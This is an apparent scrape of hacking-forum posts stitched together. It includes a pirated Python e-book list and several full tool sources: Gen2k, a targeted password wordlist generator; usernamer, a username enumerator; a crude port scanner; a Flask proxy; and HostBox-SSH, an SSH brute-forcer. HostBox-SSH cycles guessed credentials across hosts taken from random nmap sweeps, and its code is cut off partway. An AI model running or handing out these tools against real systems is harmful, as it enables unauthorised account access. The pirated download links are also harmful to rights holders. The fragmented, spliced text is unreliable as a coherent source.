open(os.path.join('HashTag',value) + '.txt', "a") as f: f.write(key + '\n') else: with open(os.path.join('HashTag','HashTag_Invalid_Hashes') + '.txt', "a") as g: g.write(key + '\n') notifyCount += 1 if (notifyCount % tenPercentCount) == 0: print '{0}/{1} hashes have been identified and written.'.format(notifyCount,validHashCount) else: for key, valueList in hashDict.iteritems(): if valueList: for value in valueList: with open(os.path.join('HashTag',value) + '.txt', "a") as f: f.write(key + '\n') else: with open(os.path.join('HashTag','HashTag_Invalid_Hashes') + '.txt', "a") as g: g.write(key + '\n') notifyCount += 1 if (notifyCount % tenPercentCount) == 0: print '{0}/{1} hashes have been identified and written.'.format(notifyCount,validHashCount) print '\n{0} hashes have been identified and written to separate files based on hash type.\nA full list has been written to file {1}'.format(notifyCount, outputFile.name) Sources - Documentation: https://github.com/SmeegeSec/HashTag Smeege Sec: HashTag: Password Hash Identification

Regex101.com is a free of charge regex testing service where you can easily create expressions while you simultaneously have real time error detection, highlighting and explanation of your regex. Thanks to the permalink feature, it is a great reference which may even be used in code where you need to explain your regular expressions to co-workers. Link: regex101.com

Link for non-registered users: http://goo.gl/l80Ibl For you who are eager to learn Python I will try to make a complete list of learning resources for this language. This list can and will include: Books, Videos, Tutorials and Websites which will help you learn python from beginner to advance to expert. Whenever you encounter a problem or get stuck with any of the material below I recomend you visit Our Documentation | Python.org E-Books in English: Programming Python, 4th Edition - Powerful Object-Oriented Programming, 4th Edition (2010).pdf 30.6 MB [ Download ] [ New] Python for Secret Agents (2014).pdf 1.4 MB [ Download ] [ New] Learning Python 5th Edition (2013).pdf 14.5 MB [ Download ] Programming in Python 3 - A Complete Introduction to the Python Language, 2nd Edition (2010).pdf 2.5 MB [ Download ] Python Algorithms: Mastering Basic Algorithms in the Python Language, 2nd Edition (2014).pdf 4.7 MB [ Download ] [ New] Python Algorithms: Mastering Basic Algorithms in the Python Language, 1st Edition (2010).pdf 4.9 MB [ Download ] [ New] Python Cookbook 3rd Edition - Recipes for Mastering Python 3 (2013).pdf 9.8 MB [ Download ] Learn Raspberry Pi - Programming with Python (2014).pdf 12.5 MB [ Download ] [ New] Expert Python Programming (2008).pdf 10.2 MB [ Download ] Foundations of Python Network Programming, Second Edition (2010).pdf 3.2 MB [ Download ] Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers & Security Engineers.pdf 7.8 MB [ Download ] Gray Hat Python - Python Programming for Hackers and Reverse Engineers (2009).pdf 3.0 MB [ Download ] Natural Language Processing with Python (2009).pdf 3.1 MB [ Download ] Dive into Python 3 (2009).pdf 2.5 MB [ Download ] Professional Python Frameworks - Web 2.0 Programming with Django and TurboGears (2007).pdf 10.3 MB [ Download ] Python.Web.Development.with.Django.pdf 4.3 MB [ Download ] Mobile Python - Rapid Prototyping of Applications on the Mobile Platform (2007).pdf 3.0 MB [ Download ] Beginning Python - Using Python 2.6 and Python 3.1 (2010).pdf 5.8 MB [ Download ] [ New] Python - Create - Modify - Reuse (2008).pdf 6.9 MB (This is quite old: Python 2.5.1, not so recommended) [ Download ] [ New] Python and AWS Cookbook - Managing Your Cloud with Python and Boto (2011).pdf 3.69 MB [ Download ] [ New] Videos in English: Google Python Class Day 1 Part 1 Google Python Class Day 1 Part 2 Google Python Class Day 1 Part 3 Google Python Class Day 2 Part 1 Google Python Class Day 2 Part 2 Google Python Class Day 2 Part 3 Google Python Class Day 2 Part 4 How to Install & Config Python Programming Environment Python (all parts in one) Learn Python Through Public Data Hacking -- Resources Python 3 Metaprogramming Python Web Development: Undestanding Django for Beginners How to Speed up a Python Program 114,000 times. A Billion Rows per Second: Metaprogramming Python for Big Data Prediction using Python -- Slides Developing Web Apps Using the Python Pyramid Framework Tutorial scikit-learn - Machine Learning in PythonImage Processing in Python with Scikits-Image Python Packaging HTML5 and Javascript Program as Standalone Program - Desktop GTK -- Source Code Python Encryption Tutorial with PyCrypto Websites in English: Python Official Documentation Google's Python Class Learn Python The Hard Way, 3rd Edition - [ PDF ] http://www.checkio.org/ - Interactive learning resource [ New] http://www.swaroopch.com/notes/python/ - If you would like to make a pdf out of this then: 'CTRL + P' and save as pdf. [ New] The Django Book Getting Started with Django - Video Based Lessons http://openbookproject.net/thinkcs/python/english3e/ [ New] Blender/Python Tutorials Online Python Tutor- Source Code Dive Into Python Try Python: Interactive - Attention: Doesn't work without silverlight LearnPython.org Interactive Python Tutorial Learn Python while working on projects http://interactivepython.org/ [ New] Also a bonus for registered users: https://rstforums.com/forum/89509-free-python-ebooks.rst Ce nu as da ca sa pot absorvi toate informatiile astea mai repede! Daca aveti resurse pe tema python le puteti lasa in commenturi si le voi adauga in post.

Hello Friend's i Have Start python Tutorial . I have Start python at Beginning . TO Expert (Exploit Development ) So Visit - Python With Security Need

The time has come to update this little script. Since Photobucket switched from Beta design to what they use now, this script has stopped working. I am sorry for the delay, I would have posted this sooner but I too have a life Anyway, the new Photobucket design is ugly, I probably don’t need to tell you that, and they had been holding off the slideshow feature for quite some time. Recently it was implemented and I hoped my script would work without much modifications… but alas, they just had to redesign it all. They used weird Javascript to load 12 images at a time, so needless to say it was not the way to go about doing this… I had to find another way. After looking around I noticed that photobucket has a mobile version of the website which is accessible with a mobile user-agent. I don’t know if the design there has changed along with main website design, if not then silly me for not spotting this sooner It means this script would of worked even after the update… but there is a catch with this. Method I use now is pretty much the same as it was before, just now everything is loaded off a mobile version of the website. When you press the Slideshow button, all the information gets written to a source file and then get fed to a Flash player that shows a slideshow. Because this uses a flash player, a specific user-agent is required, one from a mobile that supports flash player… otherwise the website is smart enough to somehow tell if that phone can play flash Well, even though I had found a method downloading images again, I cannot find a method downloading videos again… seems like the mobile version doesn’t load videos into the slideshow. But all the videos can be found in that image listing… and of course I could read the last page number, go through every page parsing HTML code to see if it contains a video and if it does then to read HTML code from the video page and finally download everything… but that is too much work for me right now and such method is very prone to error… maybe if someone could make it and send it to me, I’ll be more than happy to implement it into a script So for now, no video downloading, sorry To find the login form I used code suggested by Kyle, it worked great. Thanks Kyle! Everything can be downloaded from the same location, here: PhotobucketGetter.zip Source: Photobucket album downloader v0.7 | Kulverstukas's blog

What is it? It’s an automated word list generator. What is a word list? Word list is like a list of possible passwords that you can use to crack hashes with, perform brute force attacks on various protocols & may be used for just about any cracking in general. Why would I need an automated word list generator? Well, actually you don’t need to generate your own as there are already some pretty good word lists floating around on the web. But there are times when you would want a personalized word list to fine tune your attacks; especially if you know the target well. In such cases automated word list generators may come in handy as it allows you to make educated guesses regarding what the password might be rather than just brute forcing with totally random, irrelevant word list. How is it different? Gen2k is still in beta, but works flawlessly as of now. It’s not your typical word list generator, and doesn’t intend to be one. There are already good ones out there like Crunch, etc. Gen2k aims to be a smart word list generator, it takes sample words as input. Sample words can be anything that you know about the target, from area, date of birth to names & special events, etc. Once a list of all those known words have been supplied to Gen2k, it automatically, based on the options set..determines the best possible way to make a word list out of those. As many of you know, people tend to use birth year, specific dates, random numbers, custom words attached to simple words in order to make their passwords more complex. Gen2k aims to exploit those types of weaknesses along with conversion of words to upper & lower cases to make your word list completely personalized & appropriate for the situation. It has most of the features that I thought of implementing when I started working on it and obviously it can be improved further. It’s written completely in Python. It’s fast, light weight & doesn’t have any external dependencies. What are it’s features? Generates password combinations by combining supplied words. Mixes frequently used number patterns with words. Generates password combinations using year/date combo. Mixes custom user defined value(s) combination with words. Option to auto convert words to upper/lowercase & capitalisation. WPA/WPA2 password validation check. No external dependencies. So what does it look like? The list can get very large indeed, so make sure you choose the options wisely. Where can I get it? #!/usr/bin/env python__author__ = 'irenicus09' __email__ = 'irenicus09[at]gmail[dot]com' __license__ = 'BSD' __version__ = 'BETA' __date__ = '18/05/2013' import sys """ ############################## GEN2K #################################### Automated Word List Generator > Generates passwords combinations by combining words from wordlist. > Covers frequently used number patterns used along with words. > Generates passwords combinations using year/date combo. > Generates custom user defined value(s) combination with word list. > Option to auto convert words to upper/lowercase & capitalisation. > WPA/WPA2 password validation check. > No external dependencies. --------------------------------------------------------------------------- HINTS: * DO NOT USE A GENERAL PURPOSE WORDLIST * SUPPLIED WORDLIST MUST ONLY CONTAIN KNOWN FACTS ABOUT TARGET E.G NAMES, ADDRESS, FAVORITE ARTIST, PLACE, EVENT, ETC. * TRY TO KEEP WORDLIST AT A MINIMUM, DON'T INCLUDE TOO MUCH DETAILS * THE FINAL GENERATED WORD LIST CAN GET EXTREMELY LARGE! ########################################################################### """ def help(): print """ ###### ######## ## ## ####### ## ## ## ## ## ### ## ## ## ## ## ## ## #### ## ## ## ## ## #### ###### ## ## ## ####### ##### ## ## ## ## #### ## ## ## ## ## ## ## ### ## ## ## ###### ######## ## ## ######### ## ## %s ======= Automated Word List Generator ======= Copyright © irenicus09 2013 USAGE: ./gen2k.py -w <wordlist> -o <output> [options] [ -c ] Enable word combination among the words in wordlist. [ -d ] Custom comma separated values to combine with wordlist. [ -e ] Enable wpa/wpa2 fitness check for generated passwords. [ -h ] Prints this help. [ -n ] Enable frequently used number combination with wordlist. [ -o ] Output filename. [ -w ] Path to word list file. Wordlist must contain info related to Target. [ -y ] Enable year combination with wordlist. [ -z ] Enable conversion of words to upper & lower case letters. Note: Conversion to upper/lowercase & capitalisation takes place before other modes are applied to the original list. """ % __version__ def main(): if exist('-h'): help() sys.exit(0) if not (exist('-w') or exist('-o')): help() sys.exit(1) master_list = load_words(find('-w')) # List supplied by user data = [] # Final wordlist temp = [] # Temporary wordlist if exist('-z'): master_list = gen_case(master_list) data = master_list if exist('-c'): temp = gen_word_combo(master_list) data = list(set(temp+data)) if exist('-n'): temp = gen_numbers(master_list) data = list(set(temp+data)) if exist('-y'): temp = gen_year(master_list) data = list(set(temp+data)) if exist('-d'): try: custom_values = find('-d').split(',') except (AttributeError): print '[!] Are you kidding me with no values?' sys.exit(1) temp = gen_custom(master_list, custom_values) data = list(set(temp+data)) if exist('-e'): data = wpa_validation_check(data) write_file(find('-o'), data) print '[*] Total words generated: %d' % (len(data)) sys.exit(0) def merge_list(temp_list=[], final_list=[]): """ Merges contents from temp_list (1st param) with final_list (2nd param) """ for word in temp_list: if word not in final_list: final_list.append(word) def load_words(path_to_file): """ Function to fetch all possible words. """ data = [] try: handle = open(path_to_file, 'r') temp_list = handle.readlines() handle.close() except(BaseException): print '[!] Error occured while reading wordlist.' sys.exit(1) for word in temp_list: word = word.strip() if word != '': data.append(word) return data def write_file(path_to_file, data=[]): """ Writing to specified file. """ try: handle = open(path_to_file, 'wb+') for word in data: handle.write(word+'\n') handle.close() except(BaseException): print '[!] Error occured while writing to file.' sys.exit(1) def gen_case(words=[]): """ Function to change words to Upper & Lower case. """ custom_list = [] for x in words: custom_list.append(x.lower()) custom_list.append(x.capitalize()) custom_list.append(x.upper()) return list(set(custom_list)) def gen_numbers(words=[]): """ Function to mix words with commonly used numbers patterns. """ word_list = [] if len(words) <= 0: return word_list num_list = ['0', '01', '012', '0123', '01234', '012345', '0123456', '01234567', '012345678', '0123456789', '1', '12', '123', '1234','12345', '123456','1234567','12345678','123456789', '1234567890', '9876543210', '987654321', '87654321', '7654321', '654321', '54321', '4321', '321', '21'] for word in words: for num in num_list: word_list.append((word+num)) word_list.append((num+word)) return word_list def gen_year(words=[]): """ Function to mix auto generated year with words from wordlist. Hint: Date of birth & special dates are often combined with certain words to form passwords. """ word_list = [] if len(words) <= 0: return word_list # Double digit dates start = 1 while(start <= 99): for word in words: word_list.append(word + str("%02d") % (start)) word_list.append(str("%02d") % start + word) start += 1 # Four digit dates start = 1900 while (start <= 2020): for word in words: word_list.append(word+str(start)) word_list.append(str(start)+word) start += 1 return word_list def gen_word_combo(words=[]): """ Function to mix multiple words from given list. """ word_list = [] if len(words) <= 1: return word_list for word in words: for second_word in words: if word != second_word: word_list.append(second_word+word) return word_list def gen_custom(words=[], data=[]): """ Funtion to combine user defined input with wordlist. > Takes a comma separated list via cmdline as values. """ word_list = [] if (len(words) <= 0 or len(data) <= 0): return word_list for item in data: for word in words: word_list.append(item+word) word_list.append(word+item) return word_list def wpa_validation_check(words=[]): """ Function to optimise wordlist for wpa cracking > Removes Duplicates. > Removes passwords < 8 or > 63 characters in length. """ custom_list = list(set(words)) custom_list = [x for x in custom_list if not (len(x) < 8 or len(x) > 63)] return custom_list # S3my0n's argument parsers, thx brah def find(flag): try: a = sys.argv[sys.argv.index(flag)+1] except (IndexError, ValueError): return None else: return a def exist(flag): if flag in sys.argv[1:]: return True else: return False if __name__ == '__main__': main() or [Python] Gen2k [Automated Word List Generator] - Pastebin.com Source: https://irenicus09.wordpress.com/2013/05/19/gen2k-automated-wordlist-generator/

the following code is all you need to have a proxy up and running in like 10 seconds from flask import Flask from flask import request import requests app = Flask(__name__) hosttorequest = 'www.cnn.com' @app.route('/') def root(): r = requests.get('http://'+hosttorequest+'/') return r.content @app.route('/<path:other>') def other(other): r = requests.get('http://'+hosttorequest+'/'+other) return r.content if __name__ == '__main__': app.run(host='0.0.0.0', port=80) Now this sure makes it easy to start hiding some stuff in there. To get it up and running just do: sudo python filename.py Quick tiny python web proxy | DiabloHorn

#!/usr/bin/env python """ Scanner pentru orice cu o adresa IP si care nu are parola && user (sper sa-i fie de folos cuiva) """ import sys import socket import struct raw_ip = raw_input("Enter the starting IP address: ") port = raw_input("Enter the port you want to scan: ") ip_number = raw_input("Enter the numer of IPs you want to scan: ") print "Working..." ip2int = lambda ipstr: struct.unpack('!I', socket.inet_aton(ipstr))[0] int2ip = lambda n: socket.inet_ntoa(struct.pack('!I', n)) ip_number = int(ip_number) inted_ip = ip2int(raw_ip) i = 1 while i <= ip_number: if i == ip_number: print 'Job Done.' try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((raw_ip, int(port))) if result == 0: f = open('list.txt', 'w') f.write(int2ip(inted_ip) + ':' + port + '\n') else: print "Nothing found." inted_ip+=i sock.close() except KeyboardInterrupt: print "Exiting..." sys.exit() except socket.error: print "Could not connect to the server. Exiting..." sys.exit() i += 1;

usernamer is a penetration testing tool to generate a list of possible usernames/logins for determined name (ex: John Doe Doeson) for user enumeration or bruteforcing. This tool also supports text-files with one name per line as input. Features usernamer has a plugin structure that enables a series of transformations: normal: Permutates given name with all surnames (if more than one) with name starting and ending (johndoedoeson,johndoesondoe,doedoesonjohn etc) two_terms: Permutates given name with all surnames (if more than one) with name starting and ending but it will output a two-termed login (johndoe, doejohn, johndoeson etc) one_term: Permutates all name tokens (first name and surnames) and generates single terms usernames (john, doe, doeson) dotted_two_terms: Permutates given name with all surnames (if more than one) with name starting and ending but it will output a two-termed login dot-separated (john.doe, doe.john, john.doeson etc) normal_abbreviated: Generates abbreviated versions of the ‘normal’ and ‘two_terms’ plugins (jdoe, johnd, jd etc) Usage: usage: usernamer.py [ -f <file> ] [ -n <full name> ] [ -l ] flags: -n supplies a single name -f supplies name entries from text file -l converts result to lowercase -p manually specify plugins (comma-separated) [default: all] ['normal', 'two_terms', 'one_term', 'normal_abbreviated', 'dotted_two_terms'] usernamer.py #!/usr/bin/env python""" $Id: $ Copyright © 2012-2013 Jan Seidl <jseidl@wroot.org> (http://wroot.org/) LICENSE: This software is distributed under the GNU General Public License version 3 (GPLv3) LEGAL NOTICE: THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS. """ import getopt, sys import string #### # Program info #### USERNAMER_VERSION="1.0-rc1" BUILD_DATE="2012-03-15" AVAILABLE_PLUGINS=[ 'normal', 'two_terms', 'one_term', 'normal_abbreviated', 'dotted_two_terms' ] AVAILABLE_FILTERS=[ 'sort', 'unique' ] #### # Program Functions #### def parse_file(filePath, plugins = [], filters = []): try: with open(filePath, 'r') as fileObject: for line in fileObject: parse_name(line, plugins, filters) except IOError: e = "Could not open the file: " + filePath error(e) def parse_name(name, plugins = [], filters = []): name = name.strip() # Trim whitespaces nameTokens = name.split(' ') # Tokenize name and each surname numTokens = len(nameTokens) if numTokens < 2: error('Name and at least one Surname must be supplied') # Split First Name and Surnames firstName = nameTokens[0] nameTokens.pop(0) surnames = nameTokens results = [] # Run Plugins run_plugins(firstName, surnames, results, plugins) # Run Filters run_filters(results, filters) for result in results: print result def run_plugins(firstName, surnames, resultList, plugins = []): defaultPlugins = AVAILABLE_PLUGINS if len(plugins) == 0: plugins = defaultPlugins for pluginName in plugins: internalPluginName = "plugin_"+pluginName # Validate if plugin exists if not internalPluginName in globals(): error("Invalid plugin: "+pluginName) pluginObject = globals()[internalPluginName] pluginObject(firstName, surnames, resultList) def run_filters(resultList, filters = []): defaultFilters = AVAILABLE_FILTERS if len(filters) == 0: filters = defaultFilters for filterName in filters: internalFilterName = "filter_"+filterName # Validate if filter exists if not internalFilterName in globals(): error("Invalid plugin: "+filterName) filterObject = globals()[internalFilterName] filterObject(resultList) #### # Result Filters #### # Unique Filter # # Removes duplicated entries def filter_unique(resultList): uniqueResults = set(resultList) del resultList[:] for result in uniqueResults: resultList.append(result) # Sort Filter # # Filter entries alphabetically def filter_sort(resultList): resultList.sort() # Lowercase Filter # # Transforms entries to lowercase def filter_lowercase(resultList): for key, result in enumerate(resultList): resultList[key] = result.lower() #### # Parsing Plugins #### # Normal Plugin # # Generates usernames based on concatenation # of first name with surnames in permutation # # Ex: JohnPaulJones, JohnJonesPaul def plugin_normal(firstName, surnames, resultList): surnamePermutations = permutate_all(surnames) for permutations in surnamePermutations: resultList.append(firstName+string.join(permutations, '')) resultList.append(string.join(permutations, '')+firstName) # Two Terms Plugin # # Generates usernames based on concatenation # of first name with surnames in permutation # # Ex: JohnPaul, JohnJones, PaulJones def plugin_two_terms(firstName, surnames, resultList): # Try each surname with # first name and reversed for surname in surnames: resultList.append(firstName+surname) resultList.append(surname+firstName) # If more than one surname, # combine'em too if len(surnames) > 1: tokens = list(surnames) for surname in surnames: firstToken = tokens.pop(0) for token in tokens: resultList.append(firstToken+token) # One Term Plugin # # Generates usernames based on permutation # of first name and surnames generating one-word # usernames # # Ex: John, Paul, Jones def plugin_one_term(firstName, surnames, resultList): tokens = [ firstName ] tokens += surnames for name in tokens: resultList.append(name) # Dotted Two Terms Plugin # # Generates usernames based on concatenation # of first name with surnames in permutation # with a dot in the middle # # Ex: John.Paul, John.Jones, Paul.Jones def plugin_dotted_two_terms(firstName, surnames, resultList): # Try each surname with # first name and reversed for surname in surnames: resultList.append(firstName+'.'+surname) resultList.append(surname+'.'+firstName) # Normal Abbreviated Plugin # # Generates usernames based on concatenation # of first name with surnames in permutation # in abbreviated forms # # Ex: JohnPJones, JohnPaulJ, JohnJonesP JohnJPaul def plugin_normal_abbreviated(firstName, surnames, resultList): permutatedSurnames = permutate_all(surnames) firstNameArr = [ firstName ] # All Terms for entry in permutatedSurnames: nameFirst = list(firstNameArr+entry) nameLast = list(entry+firstNameArr) for name in abbreviate(nameFirst): resultList.append(name) for name in abbreviate(nameLast): resultList.append(name) # Two Words for surname in surnames: for name in abbreviate([ firstName, surname ]): resultList.append(name) for name in abbreviate([ surname, firstName]): resultList.append(name) #### # Util functions #### def permutate_all(tokens): if len(tokens) <=1: yield tokens else: for perm in permutate_all(tokens[1:]): for i in range(len(perm)+1): yield perm[:i] + tokens[0:1] + perm[i:] def abbreviate(tokens): resultList = [] tokenCount = len(tokens) # One abbreviated word for i in range(tokenCount): output = '' position = 0 for j in tokens: if i == position: output += j[0] else: output += j position += 1; resultList.append(output) # Two abbreviated words for i in range(tokenCount): output = '' position = 0 for j in tokens: if i == position or i == position+1: output += j[0] else: output += j position += 1; resultList.append(output) # All-but-one abbreviated words if tokenCount > 3: for i in range(tokenCount): output = '' position = 0 for j in tokens: if i == position: output += j else: output += j[0] position += 1; resultList.append(output) return resultList #### # Main #### def main(): try: opts, args = getopt.getopt(sys.argv[1:], "hlp:f:n:", ["help", "lowercase", "plugins", "file=,"name=]) inputFile = None inputName = None defaultPlugins = AVAILABLE_PLUGINS defaultFilters = AVAILABLE_FILTERS for o, a in opts: if o in ("-h", "--help"): usage() sys.exit() elif o in ("-f", "--file"): inputFile = a elif o in ("-p", "--plugins"): pluginList = str(a).split(',') validPlugins = [] for plugin in pluginList: try: pluginIndex = AVAILABLE_PLUGINS.index(plugin) # check plugin existance validPlugins.append(plugin) except ValueError: error('Invalid plugin: "'+plugin+'"') defaultPlugins = validPlugins elif o in ("-n", "--name"): inputName = a elif o in ("-l", "--lowercase"): defaultFilters.append('lowercase') else: error("option '"+o+"' doesn't exists") if inputFile == None and inputName == None: error('Please specify an input file or name') if inputFile != None and inputName != None: error('Please specify only an input file or name, not both') # If name was supplied, # process single entry and exit if inputName: parse_name(inputName, plugins = defaultPlugins, filters = defaultFilters) sys.exit(0) # If file was supplied, # process each line if inputFile: parse_file(inputFile, plugins = defaultPlugins, filters = defaultFilters) sys.exit(0) except getopt.GetoptError, err: # print help information and exit: sys.stderr.write(str(err)) usage() sys.exit(2) def usage(): print print "usage: " + sys.argv[0] + " [ -f <file> ] [ -n <full name> ] [ -l ]"; print print "flags:" print "\t-n\tsupplies a single name" print "\t-f\tsupplies name entries from text file" print "\t-l\tconverts result to lowercase" print "\t-p\tmanually specify plugins (comma-separated) [default: all]" print "\t\t"+str(AVAILABLE_PLUGINS) print "" def error(errorMsg, fatal=True, showUsage=True): sys.stderr.write(errorMsg+"\n") if showUsage: usage() if fatal: sys.exit(2) if __name__ == "__main__": main() Download Download the latest version of usernamer directly from the github project page. Source

HostBox SSH is a python script will scan servers and routers for insecure SSH configurations. INSTALL INSTALLING WXPYTHON ------------------- http://wiki.wxpython.org/InstallingOnUbuntuOrDebian INSTALLING PARAMIKO ------------------- sudo apt-get install python-paramiko RUNNING HOSTBOX-SSH ------------------- HostBox can run in either console mode or gui mode. To start the app in gui mode simply run the script without arguments. GUI output is sent to console, so it might be good to run it with a xterm. Scans started through the gui will run as a separate thread, so you can start several ssh scans through the gui! Results are logged to the logs/ directory with the time/date of the scan. Only successful logins are logged to file. To run the scanner in console mode the syntax is as: HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2] Break Option: -1: Break on account login -2: Break on server login The scanner can now handle nmap greppable logs as input, so one can do f.e: nmap -P0 -iR 20000 -p 22 -oG sshscan.log And then.. ./HostBox-SSH.py -i sshscan.log -u guest,test -p -username,blank -2 You can also import nmap greppable logs in the gui and scan through there. When specifying passwords in console or gui you can use "blank" to scan for blank passwords and/or "-username" to scan for the usernames as password. That's about it I guess! I've had very limited time to test the app, so feel free to report bugs/problems at https://stridsmanit.wordpress.com/ssh-scanner/ or drop me a mail: ostridsman@bredband.net. -- Oskar Stridsman's IT Resource: stridsmanIT.wordpress.com -- HostBox-SSH.py #!/usr/bin/python # # Released with GNU GENERAL PUBLIC LICENSE, http://www.gnu.org/licenses/gpl.html # # Tool is written by Oskar Stridsman ostridsman@bredband.net # # Visit Oskar Stridsman's IT Resource - stridsmanIT.wordpress.com # # Released as version 0.1.1 December 01, 2012 import time import sys import os import getopt from wxPython.wx import * import thread import wx import socket import paramiko ID_NEW = 1 ID_RENAME = 2 ID_CLEAR = 3 ID_DELETE = 4 ID_USR = 5 ID_PSW = 6 ID_SCN = 7 SCAN_INDEX = 1 class HostBox(wx.Frame): def __init__(self, parent, id, title): wx.Frame.__init__(self, parent, id, title, size=(946, 686)) panel = wx.Panel(self, -1) hbox = wx.BoxSizer(wx.HORIZONTAL) self.scanindex = 1 self.usernames = "admin;root;guest" self.passwords = "blank;password;-username" self.listbox = wx.ListBox(panel, -1) hbox.Add(self.listbox, 1, wx.EXPAND | wx.ALL, 20) vbox = wx.BoxSizer(wx.VERTICAL) btnPanel = wx.Panel(panel, -1) new = wx.Button(btnPanel, ID_NEW, 'Import', size=(90, 30)) ren = wx.Button(btnPanel, ID_RENAME, 'Rename', size=(90, 30)) dlt = wx.Button(btnPanel, ID_DELETE, 'Delete', size=(90, 30)) clr = wx.Button(btnPanel, ID_CLEAR, 'Clear', size=(90, 30)) setusr = wx.Button(btnPanel, ID_USR, 'Set Usernames', size=(120, 30)) setpass = wx.Button(btnPanel, ID_PSW, 'Set Passwords', size=(120, 30)) startscan = wx.Button(btnPanel, ID_SCN, 'Start Scan', size=(120, 30)) self.skipacc = wxCheckBox ( btnPanel,-1, 'skip on successful account login' ) self.skipsrv = wxCheckBox ( btnPanel,-1, 'skip on successful server login' ) self.Bind(wx.EVT_BUTTON, self.NewItem, id=ID_NEW) self.Bind(wx.EVT_BUTTON, self.OnRename, id=ID_RENAME) self.Bind(wx.EVT_BUTTON, self.OnDelete, id=ID_DELETE) self.Bind(wx.EVT_BUTTON, self.OnClear, id=ID_CLEAR) self.Bind(wx.EVT_LISTBOX_DCLICK, self.OnRename) self.Bind(wx.EVT_BUTTON, self.Usr, id=ID_USR) self.Bind(wx.EVT_BUTTON, self.Psw, id=ID_PSW) self.Bind(wx.EVT_BUTTON, self.Scan, id=ID_SCN) vbox.Add((-1, 20)) vbox.Add(new) vbox.Add(ren, 0, wx.TOP, 5) vbox.Add(dlt, 0, wx.TOP, 5) vbox.Add(clr, 0, wx.TOP, 5) vbox.Add(setusr, 0, wx.TOP, 5) vbox.Add(setpass, 0, wx.TOP, 5) vbox.Add((-1, 55)) vbox.Add(startscan, 0, wx.TOP, 5) vbox.Add((-1, 55)) vbox.Add(self.skipacc, 0, wx.TOP, 5) vbox.Add(self.skipsrv, 0, wx.TOP, 5) btnPanel.SetSizer(vbox) hbox.Add(btnPanel, 0.6, wx.EXPAND | wx.RIGHT, 20) panel.SetSizer(hbox) self.Centre() self.Show(True) def funcScan(self,hosts,index,skipacc,skipsrv): breakacc = False breaksrv = False users = [] passw = [] if ';' in self.usernames: users = self.usernames.split(';') elif ',' in self.usernames: users = self.usernames.split(',') else: users.append(self.usernames) if ";" in self.passwords: passw = self.passwords.split(';') elif "," in self.passwords: passw = self.passwords.split(',') else: passw.append(self.passwords) pathname = "" localtime = time.asctime( time.localtime(time.time()) ) localtime = localtime.replace(' ', '_') ext = ["logs/",localtime, ".slg"] pathname = pathname.join(ext) flogfile = open(pathname, "w") for h in hosts: s = socket.socket() try: s.connect((h, 22)) s.close() for u in users: if breaksrv: breaksrv = False break if breakacc: breakacc = False next for p in passw: if breakacc: breakacc = False break if breaksrv: break if p == 'blank': p = '' if p == '-username': p = u ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print "%s: Logging in with %s / %s" % (h,u,p) try: msg = ssh.connect(h, username=u, password=p) if msg == None: print("On Host: %s found login combination: %s / %s" % (h,u,p)) flogfile.write("On Host: %s found login combination: %s / %s\n" % (h,u,p)) ssh.close() if skipacc: breakacc = True if skipsrv: breaksrv = True except: pass if breaksrv: breaksrv = False break except Exception, e: print "%s: Host Unreachable. Skipping to next!" % (h) next print "Scan %i has finished." % (index) flogfile.close() def Scan(self, event): global SCAN_INDEX index = SCAN_INDEX hosts = self.listbox.GetStrings() skipacc = False skipsrv = False if self.skipacc.GetValue(): skipacc = True if self.skipsrv.GetValue(): skipsrv = True thread.start_new_thread(self.funcScan,(hosts,index,skipacc,skipsrv)) SCAN_INDEX += 1 wx.MessageBox('Scanner started, positive results will be written to the log directory', 'Info', wx.OK | wx.ICON_INFORMATION) def Usr(self, event): sel = self.usernames text = sel renamed = wx.GetTextFromUser('Rename item', 'Set usernames', text) if renamed != '': self.usernames = renamed def Psw(self, event): sel = self.passwords text = sel renamed = wx.GetTextFromUser('Rename item', 'Set passwords', text) if renamed != '': self.passwords = renamed def NewItem(self, event): filters = 'All files (*.*)|*.*|Stridsman Logfiles (*.slg)|*.slg' dialog = wxFileDialog ( None, message = 'Open something....', wildcard = filters, style = wxOPEN | wxMULTIPLE ) if dialog.ShowModal() == wxID_OK: selected = dialog.GetPath() dialog.Destroy() fobject = open(selected, "r") hostlines = fobject.readlines() fobject.close() if "# Nmap" in hostlines[0]: succimport = False for l in hostlines: if "Ports: 22/open/" in l: ip = l.split(' ') self.listbox.Append(ip[1]) succimport = True if succimport == False: wx.MessageBox('No open ssh ports found in the selected file (or not a greppable nmap log!)', 'Info', wx.OK | wx.ICON_INFORMATION) else: for lines in hostlines: lines = lines.strip('\n') self.listbox.Append(lines) def OnRename(self, event): sel = self.listbox.GetSelection() text = self.listbox.GetString(sel) renamed = wx.GetTextFromUser('Rename item', 'Rename dialog', text) if renamed != '': self.listbox.Delete(sel) self.listbox.Insert(renamed, sel) def OnDelete(self, event): sel = self.listbox.GetSelection() if sel != -1: self.listbox.Delete(sel) def OnClear(self, event): self.listbox.Clear() def printHelp(): os.system("clear") print 'HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2]' print '\nBreak Option: -1: Break on account login' print '\n -2: Break on server login\n\n' def consoleScan(hostlist,usernames,passwords,skipacc,skipsrv): breakacc = False breaksrv = False users = [] passw = [] if ';' in usernames: users = usernames.split(';') elif ',' in usernames: users = usernames.split(',') else: users.append(usernames) if ";" in passwords: passw = passwords.split(';') elif "," in passwords: passw = passwords.split(',') else: passw.append(passwords) pathname = "" localtime = time.asctime( time.localtime(time.time()) ) localtime = localtime.replace(' ', '_') ext = ["logs/",localtime, ".slg"] pathname = pathname.join(ext) flogfile = open(pathname, "w") os.system("clear") for h in hostlist: s = socket.socket() try: s.connect((h, 22)) s.close() for u in users: if breakacc: breakacc = False next for p in passw: if breakacc: breakacc = False break if breaksrv: break if p == 'blank': p = '' if p == '-username': p = u ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print "%s: Logging in with %s / %s" % (h,u,p) try: msg = ssh.connect(h, username=u, password=p) if msg == None: print("On Host: %s 